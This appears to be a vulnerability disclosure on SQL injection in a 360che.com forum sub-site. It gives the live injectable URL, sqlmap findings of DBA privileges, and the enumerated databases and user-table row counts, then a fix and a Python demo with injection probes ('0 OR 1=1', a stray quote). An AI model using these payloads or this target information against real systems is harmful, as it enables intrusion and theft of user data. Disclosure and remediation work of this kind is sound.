SQL injection vulnerability in a Truck Home (360che.com) sub-site (DBA privileges + 400,000+ user records)
Injection URL:
http://auman.360che.com/viewthread.php?tid=397430&page=3
0x00 Manual check
Tampering with the request parameter makes the page return a raw database error instead of the thread, which is a strong indicator of SQL injection (error-based, so the backend is reflecting the broken query back to the client).
0x01 sqlmap verification
sqlmap confirms that the parameter is injectable and reports that the database account used by the web application has DBA privileges, so the whole MySQL instance, not just the forum database, is exposed.
Databases enumerated by sqlmap:
available databases [20]:
[*] 360che
[*] 360tools
[*] auman
[*] cms
[*] diaocha
[*] ershouche
[*] faw_choujiang
[*] gtl_460
[*] gtl_zaihuoche
[*] huvh
[*] information_schema
[*] jiefang
[*] kucunche
[*] limesurvey
[*] mysql
[*] performance_schema
[*] qdjiefang
[*] shanghaichezhan
[*] sms
[*] zhuanti_jac
400,000+ user records (row counts per table, sorted by size):
Database: 360che
+--------------------+----------+
| Table              | Entries  |
+--------------------+----------+
| uc_pms             | 10300481 |
| uc_friends         | 421112   |
| uc_memberfields    | 417407   |
| uc_members_11      | 417390   |
| uc_members         | 417388   |
| shouji             | 400000   |
| mobile             | 273683   |
| uc_newpm_bak       | 265691   |
| uc_members20130702 | 213705   |
| tianyamember       | 177717   |
| uc_members20120117 | 102331   |
+--------------------+----------+
The uc_members / uc_memberfields tables are the UCenter account tables (roughly 417,000 accounts), and the dated copies (uc_members20120117, uc_members20130702) are old backups left in the live database, so the same user data is exposed several times over.
Solution:
Do not concatenate request parameters into SQL. Cast tid and page to integers (reject anything that is not a plain non-negative integer) and use parameterized queries / prepared statements for every database call. In addition, run the web application with a least-privilege MySQL account: it should only have access to its own database and must not have DBA or FILE privileges, so that a single injection cannot reach the other 19 databases.
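The vulnerable pattern and the fix side by side, as an added example that is not code from the 360che site (whose stack is PHP/MySQL). It mirrors the viewthread.php?tid= handler in Python against an in-memory SQLite table with a hypothetical `threads` schema, and the probe() helper reproduces what the manual check above observes: a quote produces a database error on the vulnerable path, a boolean payload leaks extra rows, and the hardened handler rejects both before any SQL is built.

```python
import re
import sqlite3

# Constructed stand-in for the forum database (hypothetical schema, not the
# real 360che tables). tid 397430 is the thread id from the injection URL.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE threads (tid INTEGER PRIMARY KEY, subject TEXT)")
    conn.executemany(
        "INSERT INTO threads VALUES (?, ?)",
        [(397430, "Auman thread"), (1, "another thread")],
    )
    return conn

def view_thread_vulnerable(conn, tid):
    # The bug: the raw request parameter is pasted into the query text,
    # i.e. the equivalent of "WHERE tid=$_GET[tid]" in the PHP handler.
    sql = f"SELECT subject FROM threads WHERE tid={tid}"
    return conn.execute(sql).fetchall()

TID_RE = re.compile(r"[0-9]+")  # ASCII digits only; str.isdigit() also accepts Unicode digits

def view_thread_fixed(conn, tid):
    # 1) Validate: tid must be a plain non-negative integer, otherwise refuse.
    if not isinstance(tid, str) or TID_RE.fullmatch(tid) is None:
        raise ValueError("tid must be a non-negative integer")
    # 2) Parameterize: the value travels separately from the SQL text, so it
    #    can never change the structure of the query.
    return conn.execute(
        "SELECT subject FROM threads WHERE tid=?", (int(tid),)
    ).fetchall()

def probe(handler, conn, payload):
    """Run one request through a handler and classify what the client sees."""
    try:
        rows = handler(conn, payload)
    except sqlite3.Error:
        return "db_error"       # the raw error page seen in the manual check
    except ValueError:
        return "rejected"       # input validation refused the parameter
    return f"rows:{len(rows)}"

if __name__ == "__main__":
    conn = setup_db()
    for payload in ["397430", "397430'", "0 OR 1=1"]:
        print(repr(payload),
              "vulnerable ->", probe(view_thread_vulnerable, conn, payload),
              "| fixed ->", probe(view_thread_fixed, conn, payload))
```

Running the block shows the three behaviours the report relies on: the legitimate id returns one row from both handlers, the stray quote breaks the concatenated query (the error-based signal), and `0 OR 1=1` makes the vulnerable handler return every thread while the fixed handler rejects it without touching the database.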